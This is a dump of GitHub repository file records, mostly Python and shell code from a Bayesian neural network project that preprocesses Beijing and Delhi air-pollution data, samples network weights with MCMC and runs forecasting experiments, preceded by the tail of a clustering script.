0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Average Literacy ')\r\nplt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Above Average Literacy')\r\nplt.title('')\r\nplt.xlabel('Literacy')\r\nplt.ylabel('Persons Per Institution')\r\nplt.legend()\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.634782612323761,
"alphanum_fraction": 0.6713043451309204,
"avg_line_length": 25.380952835083008,
"blob_id": "0475fb128ef7cc6c2d124a148633965169808fdd",
"content_id": "c0342a17bad63dbf7e39c1077ddfa8a310829dc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 42,
"path": "/H_Clust(EducationVSMedInst).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 14:10:02 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndataset = pd.read_csv('UpdatedDataset1.csv')\r\nX = dataset.iloc[:, [30, 32]].values\r\n\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 0:34])\r\nX[:, 0:34] = imputer.transform(X[:, 0:34])\r\n\r\nimport scipy.cluster.hierarchy as sch\r\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\r\nplt.title('Dendrogram')\r\nplt.xlabel('Customers')\r\nplt.ylabel('Educational Institutions')\r\nplt.show()\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhc = AgglomerativeClustering(n_clusters = 3, affinity = 'euclidean', linkage = 'ward')\r\ny_hc = hc.fit_predict(X)\r\n\r\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Poor Facilities')\r\nplt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Accepatable Facilities')\r\n\r\n\r\nplt.title('Table Of Institutions')\r\nplt.xlabel('Educational Institutions')\r\nplt.ylabel('Medical Institutions')\r\nplt.legend()\r\nplt.show()\r\n"
}
] | 5 |
john-hawkins/Bayesian_Neural_Networks | https://github.com/john-hawkins/Bayesian_Neural_Networks | 8ada8d75750753cc09c3651137b580215af803cb | 301463d1779e020fd0dd2b95e19827bddf84c6b3 | f10069ccd35e6581d11bdfc4929050491c1cca16 | refs/heads/master | 2021-06-19T20:40:34.318716 | 2019-10-08T05:09:22 | 2019-10-08T05:09:22 | 148,849,995 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5554519891738892,
"alphanum_fraction": 0.6067101359367371,
"avg_line_length": 37.28571319580078,
"blob_id": "b67a1c7a6477fd4f50173e53bcd300826a7f3dc5",
"content_id": "c9f73e2518dde2ea1361a0d155d907ea2c0b20b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 28,
"path": "/data/Beijing/process_simple.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport datetime\n\ndf = pd.read_csv('data.csv')\ndf2 = df[24:].copy()\ndf2['N'] = np.where(df2.cbwd.str[0:1]=='N', 1, 0)\ndf2['S'] = np.where(df2.cbwd.str[0:1]=='S', 1, 0)\ndf2['E'] = np.where(df2.cbwd.str[1:2]=='E', 1, 0)\ndf2['W'] = np.where(df2.cbwd.str[1:2]=='W', 1, 0)\ndf2.drop([\"cbwd\"],axis = 1, inplace = True) \n\n# WHERE PM2.5 IS ZERO - POTENTIAL MEASUREMENT LIMIT ERROR - REPLACE WITH NOMINAL SMALL VALUE\ndefault_value = 0.01\ndf2[\"pm2.5\"] = np.where(df2[\"pm2.5\"] == 0, default_value,df2[\"pm2.5\"] )\n\ndf2['Date'] = df['year'].astype(str) + \"-\" + df['month'].astype(str) + \"-\" + df['day'].astype(str) + \" \" + df['hour'].astype(str) + \":00\"\n\ndf2['Date'] = df2.apply( lambda x : datetime.datetime(year=x['year'], month=x['month'], day=x['day'], hour=x['hour']).strftime(\"%Y-%m-%d %H:%M:00\"), axis=1 )\n\nfeatures = df2.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\"]\nfor x in unwanted :\n features.remove(x)\n\nfinal = df2.loc[:,features]\n\nfinal.to_csv('sets/withDate.csv', sep=',', encoding='utf-8', index=False, header=True)\n\n"
},
{
"alpha_fraction": 0.6632996797561646,
"alphanum_fraction": 0.7239057421684265,
"avg_line_length": 20.071428298950195,
"blob_id": "6f8f9f01cd6d1cd71a13c2ccba94afdf6c52383d",
"content_id": "99b53f56bd6510bc2c68ffe9c37c5d71b12d5388",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 297,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/experiments/RUN_Beijing.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\n#./RUN_BeiJing_24hr_SLP.sh\n#./RUN_BeiJing_24hr_FFNN.sh\n#./RUN_BeiJing_24hr_LangevinFFNN.sh\n\n./RUN_BeiJing_7day_SLP.sh\n./RUN_BeiJing_7day_FFNN_H5.sh\n./RUN_BeiJing_7day_FFNN_H10.sh\n./RUN_BeiJing_7day_FFNN_H15.sh\n./RUN_BeiJing_7day_DeepFFNN_H5.sh\n\n#./RUN_BeiJing_7day_LangevinFFNN.sh\n\n\n"
},
{
"alpha_fraction": 0.5318113565444946,
"alphanum_fraction": 0.5387133955955505,
"avg_line_length": 42.29118728637695,
"blob_id": "cec83969f6e2a159875c940f865050735779d541",
"content_id": "cc8e29109aeb5017a2651c7319e7051756476cf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11303,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 261,
"path": "/src/MCMC.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport datetime\nimport time\nimport math\nimport os\n\n#-------------------------------------------------------------------------------\n# DEFINE A MARKOV CHAIN MONTE CARLO CLASS\n# SPECIFIC FOR THE NEURAL NETWORK CLASS HIERARCHY \n#-------------------------------------------------------------------------------\nclass MCMC:\n def __init__(self, samples, traindata, testdata, neuralnetwork, resultsdir, eval_metric):\n self.samples = samples \n self.neuralnet = neuralnetwork\n self.traindata = traindata\n self.testdata = testdata\n self.resultsdir = resultsdir\n self.eval_metric = eval_metric\n self.ensure_resultsdir()\n\n def ensure_resultsdir(self):\n directory = os.path.dirname(self.resultsdir)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n def rmse(self, predictions, targets):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n def mae(self, predictions, targets):\n return (np.abs(predictions - targets)).mean()\n\n def mape(self, predictions, targets):\n return (np.abs(predictions - targets)/(targets+0.0000001)).mean()\n\n def reduce_data(self, data, incl):\n fltre = incl>0\n return data[fltre]\n\n def modify_included_data(self, incl):\n newincl = incl.copy()\n pos = random.choice(list(range(0, len(incl))))\n if newincl[pos]==0: \n newincl[pos]=1\n else: \n newincl[pos]=0\n return newincl\n\n def get_indecies(self, arr, val):\n return np.where(arr == val)[0]\n\n def modify_included_dataV2(self, incl):\n newincl = incl.copy()\n # DETERMINE WHETHER TO ADD OR REMOVE DATA\n action = random.uniform(0, 1)\n if (action< 0.5) :\n ind = self.get_indecies(incl, 0)\n newval = 1\n else: \n ind = self.get_indecies(incl, 1)\n newval = 0\n if (len(ind) == 0):\n return newincl\n pos_ind = random.choice(list(range(0, len(ind))))\n pos = ind[pos_ind]\n newincl[pos]=newval\n return newincl\n\n ########################################################################################\n # \n ########################################################################################\n def print(self):\n print(\"Training data:\", len(self.traindata) )\n print(\"Testing data:\", len(self.testdata) )\n\n\n ########################################################################################\n # \n ########################################################################################\n def printProgressBar (self, iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\n # Print New Line on Complete\n if iteration == total: \n print()\n\n\n ########################################################################################\n # LOGGING UTILITIES\n ########################################################################################\n def start_log_file(self):\n self.logfile = self.resultsdir + \"log.txt\"\n self.outlog = open(self.logfile, 'w')\n\n def write_log_entry(self, iteration, message):\n st = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')\n self.outlog.write(st + \"\\t\" + str(iteration) + \"\\t\" + message + \"\\r\\n\")\n self.outlog.flush()\n\n def close_log(self):\n self.outlog.close()\n\n\n ########################################################################################\n # FUNCTIONS FOR WRITING OUT THE TEST PREDICTIONS\n ########################################################################################\n def start_test_file(self):\n self.test_file_name = self.resultsdir + \"test_predictions.tsv\"\n self.test_file = open(self.test_file_name, \"w\")\n\n def write_test_entry(self, results):\n temp = \" \".join(map(str, results))\n self.test_file.write( temp + \"\\r\\n\")\n self.test_file.flush()\n\n def close_test_file(self):\n self.test_file.close()\n\n ########################################################################################\n # RUN THE MCMC SAMPLER\n ########################################################################################\n def sampler(self):\n self.start_log_file()\n self.printProgressBar(0, self.samples, prefix = 'Progress:', suffix = 'Complete', length = 50)\n self.write_log_entry(0, \"Initialising...\")\n\n # How many training and test points? \n # shape[0] Returns the first dimension of the array\n # In this instance it is the number of discrete (x,y) combinations in the data set\n testsize = self.testdata.shape[0]\n trainsize = self.traindata.shape[0]\n\n # Samples is the number of samples we are going to take in the run of MCMC\n samples = self.samples\n\n # Copy the y values into an independent vector\n y_test = self.testdata[:, self.neuralnet.input]\n y_train = self.traindata[:, self.neuralnet.input]\n\n self.write_log_entry(0, \"Training data size:\" + str(y_train.size) )\n self.write_log_entry(0, \"Testing data size:\" + str(y_test.size) )\n\n # The total number of parameters for the neural network\n w_size = self.neuralnet.get_weight_vector_length()\n\n\t# Posterior distribution of all weights and bias over all samples\n\t# We will take 'samples' number of samples\n\t# and there will be a total of 'w_size' parameters in the model.\n # We collect this because it will hold the empirical data for our \n # estimate of the posterior distribution. \n pos_w = np.ones((samples, w_size))\n\n # TAU IS THE STANDARD DEVIATION OF THE ERROR IN THE DATA GENERATING FUNCTIONS\n # I.E. WE ASSUME THAT THE MODEL WILL BE TRYING TO LEARN SOME FUNCTION F(X)\n\t# AND THAT THE OBSERVED VALUES Y = F(X) + E\n # THEN TAU IS THE STANDARD DEVIATION OF E\n # WE STORE THE POSTERIOR DISTRIBUTION OF TAU - AS GENERATED BY THE MCMC PROCESS \n pos_tau = np.ones((samples, 1))\n\n\t# F(X) BUFFER - ALL NETWORK OUTPUTS WILL BE STORED HERE\n # REMOVED BECAUSE THE MEMEORY CONSTRAINT WAS TOO HIGH FOR LARGE DATASETS\n # TODO: CONSIDER WRITING DIRECTLY TO DISK EVERY SO OFTEN\n #fxtrain_samples = np.ones((samples, trainsize)) \n #fxtest_samples = np.ones((samples, testsize)) \n\n\t# STORE EVAL METRIC FOR EVERY STEP AS THE MCMC PROGRESSES\n eval_train = np.zeros(samples)\n eval_test = np.zeros(samples)\n\n\t# WE INITIALISE THE WEIGHTS RANDOMLY \n w = np.random.randn(w_size)\n w_proposal = np.random.randn(w_size)\n self.write_log_entry(0, \"Weights Initialised\" )\n\n [pred_train, etrain] = self.neuralnet.evaluate_proposal(self.traindata, w)\n [pred_test, etest] = self.neuralnet.evaluate_proposal(self.testdata, w)\n\n self.write_log_entry(0, \"Initial Weights\" + \"\\tTrain \" + self.eval_metric + \": \" + str(etrain) + \"\\tTest\" + self.eval_metric + \":\" + str(etest))\n\n\t# INITIAL VALUE OF TAU IS BASED ON THE ERROR OF THE INITIAL NETWORK ON TRAINING DATA\n\t# ETA - IS USED FOR DOING THE RANDOM WALK SO THAT WE CAN ADD OR SUBTRACT RANDOM VALUES\n\t# SUPPORT OVER [-INF, INF]\n\t# IT WILL BE EXPONENTIATED TO GET tau_squared of the proposal WITH SUPPORT OVER [0, INF] \n eta = np.log(np.var(pred_train - y_train))\n tausq = np.exp(eta)\n \n self.write_log_entry(0, \"Initial Error Dist\" + \"\\tEta \" + str(eta) + \"\\tTau^2:\" + str(tausq))\n\n likelihood = self.neuralnet.get_log_likelihood(self.traindata, w, tausq)\n\n self.write_log_entry(0, 'Initial Likelihood: ' + str(likelihood) )\n naccept = 0\n self.write_log_entry(0, 'Begin sampling using MCMC random walk')\n\n # START A FILE TO STORE ALL PREDICTIONS FOR THE TEST DATA\n self.start_test_file()\n prev_result = pred_test\n\n for i in range(samples - 1):\n self.printProgressBar(i + 1, samples, prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n #w_proposal = self.neuralnet.get_proposal_weight_vector(w)\n #[eta_pro, tau_pro] = self.neuralnet.get_proposal_tau(eta)\n #[pred_train, rmsetrain] = self.neuralnet.evaluate_proposal(self.traindata, w_proposal)\n #[pred_test, rmsetest] = self.neuralnet.evaluate_proposal(self.testdata, w_proposal) \n #mh_prob = self.neuralnet.get_acceptance_probability(w_proposal, tau_pro, w, tausq, self.traindata)\n \n [w_proposal, eta_pro, tau_pro, pred_train, etrain, pred_test, etest, mh_prob] = self.neuralnet.get_proposal_and_acceptance_probability(w, eta, tausq, self.traindata, self.testdata)\n\n u = random.uniform(0, 1)\n\n if u < mh_prob:\n # Update position\n self.write_log_entry(i, \"Proposal Accepted\" + \"\\tTrain \" + self.eval_metric + \": \" + str(etrain) + \"\\tTest \" + self.eval_metric + \": \" + str(etest))\n naccept += 1\n w = w_proposal\n eta = eta_pro\n tausq = tau_pro\n\n pos_w[i + 1,] = w_proposal\n pos_tau[i + 1,] = tau_pro\n #fxtrain_samples[i + 1,] = pred_train\n #fxtest_samples[i + 1,] = pred_test\n self.write_test_entry(pred_test)\n prev_result = pred_test\n eval_train[i + 1,] = etrain\n eval_test[i + 1,] = etest\n\n else:\n pos_w[i + 1,] = pos_w[i,]\n pos_tau[i + 1,] = pos_tau[i,]\n #fxtrain_samples[i + 1,] = fxtrain_samples[i,]\n #fxtest_samples[i + 1,] = fxtest_samples[i,]\n self.write_test_entry(prev_result)\n eval_train[i + 1,] = eval_train[i,]\n eval_test[i + 1,] = eval_test[i,]\n self.write_log_entry( i, \"Proposal Rejected\")\n\n self.write_log_entry(samples, str(naccept) + ' Accepted Samples')\n self.write_log_entry(samples, \"Acceptance Rate:\" + str(100 * naccept/(samples * 1.0)) + '%')\n accept_ratio = naccept / (samples * 1.0)\n self.close_log()\n self.close_test_file()\n\n #return (pos_w, pos_tau, fxtrain_samples, fxtest_samples, x_train, x_test, rmse_train, rmse_test, accept_ratio)\n \n return (pos_w, pos_tau, eval_train, eval_test, accept_ratio, self.test_file_name)\n \n"
},
{
"alpha_fraction": 0.6835839748382568,
"alphanum_fraction": 0.7180451154708862,
"avg_line_length": 36.093021392822266,
"blob_id": "19c2939ccb25dae7c69cb2d0a7cd509a4a2151bb",
"content_id": "797872a0c00c58dd54ab04aaf9b4c83657a897c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1596,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 43,
"path": "/TEST_TRANSFORM_SCRIPT.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# THESE SIMPLE TESTS ENSURE THAT THE RESULTS MODIFICATION SCRIPTS FUNCTION AS EXPECTED\n\npython transform_test_results.py \"tests/test_01_result.csv\" \"tests/Test_01/test_predictions.tsv\" \"tests/Test_01/test_data.csv\" \"tests/Test_01/config.yaml\" False False False False target_value current_value \n\npython transform_test_results.py \"tests/test_02_result.csv\" \"tests/Test_02/test_predictions.tsv\" \"tests/Test_02/test_data.csv\" \"tests/Test_02/config.yaml\" True False False False target_value current_value \n\npython transform_test_results.py \"tests/test_03_result.csv\" \"tests/Test_03/test_predictions.tsv\" \"tests/Test_03/test_data.csv\" \"tests/Test_03/config.yaml\" False True False False target_value current_value \n\npython transform_test_results.py \"tests/test_04_result.csv\" \"tests/Test_04/test_predictions.tsv\" \"tests/Test_04/test_data.csv\" \"tests/Test_04/config.yaml\" False False True True target_value current_value \n\nFAILED=\"False\"\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_02_result.csv\")\"\nif [ \"$DIFF\" != \"\" ] \nthen\n echo \"TEST 2 LIKELY FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_03_result.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 3 LIKELY FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_04_result.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 4 LIKELY FAILED\"\n FAILED='True'\nfi\n\nif [ \"$FAILED\" == \"False\" ]\nthen\n echo \"ALL TRANSFORM TESTS PASSED\"\nfi\n\n#rm tests/test_01_result.csv\n#rm tests/test_02_result.csv\n#rm tests/test_03_result.csv\n#rm tests/test_04_result.csv\n\n"
},
{
"alpha_fraction": 0.5504014492034912,
"alphanum_fraction": 0.5762711763381958,
"avg_line_length": 38.28070068359375,
"blob_id": "3164cf1199bd718355c4f0abf279ca8374f17162",
"content_id": "9edc572e62f92f4e19b83c33e071c0e5e4c83a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 57,
"path": "/data/Delhi/process_7_day_joined.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nimport sys\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('delhi_pm10_all_stations_wide.csv')\n\nindex_column = \"No\"\nforecast_column = \"STN_144_PM10\"\nforecast_period = 7\nlist_of_lags = [7,14,21]\n\n# NEED TO ADD THE INDEX COLUMN\n\ndf[index_column] = range( 0, len(df) )\n\nnew_df = dg.generate_time_dependent_features( df, index_column, forecast_column, forecast_period, list_of_lags)\n\ncut_off_date = '2015-01-01'\ntrain_df = new_df[ new_df['Date']<cut_off_date ]\ntest_df = new_df[ new_df['Date']>=cut_off_date ]\n\n# ###########################################################################################################\n# WRITE OUT THE FULL UN-NORMALISED VERSION\n# ###########################################################################################################\ntrain_df.to_csv('Station_144_Train.csv', encoding='utf-8', index=False, header=True)\ntest_df.to_csv('Station_144_Test.csv', encoding='utf-8', index=False, header=True)\n\n# ###########################################################################################################\n# REMOVE UNWANTED COLUMNS, NORMALISE AND WRITE TO DISK\n# -- WE REMOVE THE DIFF VERSION OF THE TARGET \n# AS IN THIS PROBLEM DATA IS GENERALLY STATIONARY (IT DOES NOT EXHIBIT OVERALL TREND)\n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = ['No', 'Date', 'TARGET_STN_144_PM10_7_DIFF']\n\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_STN_144_PM10_7_VALUE\"\n\nconfig = nzr.create_normalization_config(train_df2)\n\nnzr.write_field_config(config, target_col, 'Delhi_Station_144__other_stns_nzr_config.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, [])\ntest_df_norm = nzr.normalize(test_df2, config, [])\n\ntrain_df_norm.to_csv('Station_144_others_Train_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('Station_144_others_Test_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n\n"
},
{
"alpha_fraction": 0.4740997552871704,
"alphanum_fraction": 0.5064510107040405,
"avg_line_length": 42.621849060058594,
"blob_id": "2094037ae208e625a2240b68de06aa759ec89f1a",
"content_id": "179d0a22869954ebb1cb1a930fb24f7bd0de9f89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5193,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 119,
"path": "/data/Beijing/process_168_hour.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nimport sys\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('data.csv')\ndf2 = df[24:].copy()\ndf2['N'] = np.where(df2.cbwd.str[0:1]=='N', 1, 0)\ndf2['S'] = np.where(df2.cbwd.str[0:1]=='S', 1, 0)\ndf2['E'] = np.where(df2.cbwd.str[1:2]=='E', 1, 0)\ndf2['W'] = np.where(df2.cbwd.str[1:2]=='W', 1, 0)\ndf2.drop([\"cbwd\"],axis = 1, inplace = True) \n# WHERE PM2.5 IS ZERO - POTENTIAL MEASUREMENT LIMIT ERROR - REPLACE WITH NOMINAL SMALL VALUE\ndefault_value = 0.01\ndf2[\"pm2.5\"] = np.where(df2[\"pm2.5\"] == 0, default_value,df2[\"pm2.5\"] )\n\nindex_column = \"No\"\nforecast_column = \"pm2.5\"\nforecast_period = 168\nlist_of_lags = [1,2,24,48]\n\nnew_df = dg.generate_time_dependent_features( df2, index_column, forecast_column, forecast_period, list_of_lags )\n\ntrainset = 30000\ntrain_df = new_df.loc[0:trainset,:]\ntest_df = new_df.loc[trainset+1:,:]\n\n# ###########################################################################################################\n# WRITE OUT THE FULL UN-NORMALISED VERSION WITH ALL TARGETS AND HEADERS\n# ###########################################################################################################\ntrain_df.to_csv('sets/Train_168_hour_full.csv', sep=',', encoding='utf-8', index=False, header=True)\ntest_df.to_csv('sets/Test_168_hour_full.csv', sep=',', encoding='utf-8', index=False, header=True)\n\n\n# ###########################################################################################################\n# CREATE A NORMALISATION CONFIGURATION TO \n# ###########################################################################################################\n\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\"]\nfor x in unwanted :\n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\nconfig = nzr.create_padded_normalization_config(train_df2, 0.05)\n\n\n# ###########################################################################################################\n#\n# GENERATE 3 DIFFERENT TRAINING AND TESTING SETS\n#\n# ###########################################################################################################\n\n# ###########################################################################################################\n# RAW TARGET NORMALISED \n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", \"TARGET_pm2.5_168_DIFF\", \"TARGET_pm2.5_168_PROP_DIFF\"]\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_VALUE\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_norm.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_norm.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n# ###########################################################################################################\n# DIFFERENCED VERSION \n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", 'TARGET_pm2.5_168_VALUE', \"TARGET_pm2.5_168_PROP_DIFF\" ]\nfor x in unwanted : \n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_DIFF\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config_diff.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n# ###########################################################################################################\n# PROPORTIONAL DIFFERENCED VERSION \n# ###########################################################################################################\nfeatures = train_df.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\", 'TARGET_pm2.5_168_VALUE', \"TARGET_pm2.5_168_DIFF\" ]\nfor x in unwanted :\n features.remove(x)\n\ntrain_df2 = train_df.loc[:,features]\ntest_df2 = test_df.loc[:,features]\n\ntarget_col = \"TARGET_pm2.5_168_PROP_DIFF\"\nnzr.write_field_config(config, target_col, 'sets/Target_168_nzr_config_prop_diff.yaml')\n\ntrain_df_norm = nzr.normalize(train_df2, config, ['N','S','E','W'])\ntest_df_norm = nzr.normalize(test_df2, config, ['N','S','E','W'])\n\ntrain_df_norm.to_csv('sets/Train_168_hour_prop_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\ntest_df_norm.to_csv('sets/Test_168_hour_prop_diff.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n"
},
{
"alpha_fraction": 0.6541143655776978,
"alphanum_fraction": 0.7573221921920776,
"avg_line_length": 64.1212158203125,
"blob_id": "4d83d3973c26d42285c3cb6ba42a8d851181e3e7",
"content_id": "e0e8b2242634a1842818518ad669e8f6a5335c14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2151,
"license_type": "no_license",
"max_line_length": 288,
"num_lines": 33,
"path": "/experiments/RUN_Delhi_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\n# STATION 144\n# Delhi Air Quality \n \npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_144_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_144_SLP_Sigmoid\" \"./results/Delhi_144_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 50000 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n# STATION 146\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_146/train_normalised.csv data/Delhi/STN_146/test_normalised.csv results/Delhi_146_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_146_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_146_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_146/test.csv\" \"data/Delhi/STN_146/nzr_config.yaml\" True False False False \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_146_SLP_Sigmoid\" \"./results/Delhi_146_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_146/test.csv\" 50000 \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\n\n\n# STATION 345\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 0 1 0 SLP sigmoid data/Delhi/STN_345/train_normalised.csv data/Delhi/STN_345/test_normalised.csv results/Delhi_345_SLP_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_345_SLP_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_345_SLP_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_345/test.csv\" \"data/Delhi/STN_345/nzr_config.yaml\" True False False False \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_345_SLP_Sigmoid\" \"./results/Delhi_345_SLP_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_345/test.csv\" 50000 \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\n\n"
},
{
"alpha_fraction": 0.7052631378173828,
"alphanum_fraction": 0.7157894968986511,
"avg_line_length": 22,
"blob_id": "00b25e2dc1dcefd2eb09433398f61d7be5917a14",
"content_id": "ed010f982c8f9ca0debad69a107db08142136b74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/analysis/RUN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
